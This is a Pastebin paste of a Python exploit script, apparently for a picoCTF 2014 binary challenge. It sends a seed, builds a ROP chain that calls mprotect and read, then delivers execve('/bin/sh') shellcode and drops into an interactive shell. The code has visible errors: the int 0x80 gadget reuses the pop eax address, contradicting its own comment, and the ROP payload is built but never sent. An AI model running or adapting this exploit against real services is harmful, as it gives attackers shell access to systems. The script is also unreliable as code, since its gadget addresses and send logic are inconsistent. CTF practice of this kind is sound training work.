Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import struct
- import socket
- import telnetlib
- def pack4(v):
- """
- Takes a 32 bit integer and returns a 4 byte string representing the
- number in little endian.
- """
- assert 0 <= v <= 0xffffffff
- # The < is for little endian, the I is for a 4 byte unsigned int.
- # See https://docs.python.org/2/library/struct.html for more info.
- return struct.pack('<I', v)
- def unpack4(v):
- """Does the opposite of pack4."""
- assert len(v) == 4
- return struct.unpack('<I', v)[0]
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- #s.connect(('vuln2014.picoctf.com', 4000))
- s.connect(('127.0.0.1', 4000))
- f = s.makefile('rw', bufsize=0)
- seed = 0x1e
- f.write(pack4(seed))
- payload = "A" * 31
- """
- int 0x80; ret offset found @ pos f0030fa
- pop eax; ret found @ pos f000d25
- pop ebx; ret found @ pos f0010a4
- pop ecx; ret found @ pos f001985
- pop edx; ret found @ pos f00107f
- """
- pop_eax = pack4(0xf000d25)
- pop_ebx = pack4(0xf0010a4)
- pop_ecx = pack4(0xf001985)
- pop_edx = pack4(0xf00107f)
- int_80 = pack4(0xf000d25)
- ####mprotect
- payload += pop_eax
- payload += pack4(0x7d) #syscall no of mprotect
- payload += pop_ebx
- payload += pack4(0xf000000) #buf
- payload += pop_ecx
- payload += pack4(0x1000 * 10) #size
- payload += pop_edx
- payload += pack4(7) #perms
- payload += int_80
- ####read
- payload += pop_eax
- payload += pack4(3) #syscall no of read()
- payload += pop_ebx
- payload += pack4(0) #stdin
- payload += pop_ecx
- payload += pack4(0xf000000) #buf
- payload += pop_edx
- payload += pack4(30) #size of shellcode (buf)
- payload += int_80
- ###trigger payload
- push_ebx = pack4(0xf00083f)
- payload += pop_ebx
- payload += pack4(0xf000000) #addr of shellcode
- payload += push_ebx
- shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
- f.write(shellcode)
- t = telnetlib.Telnet()
- t.sock = s
- t.interact()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement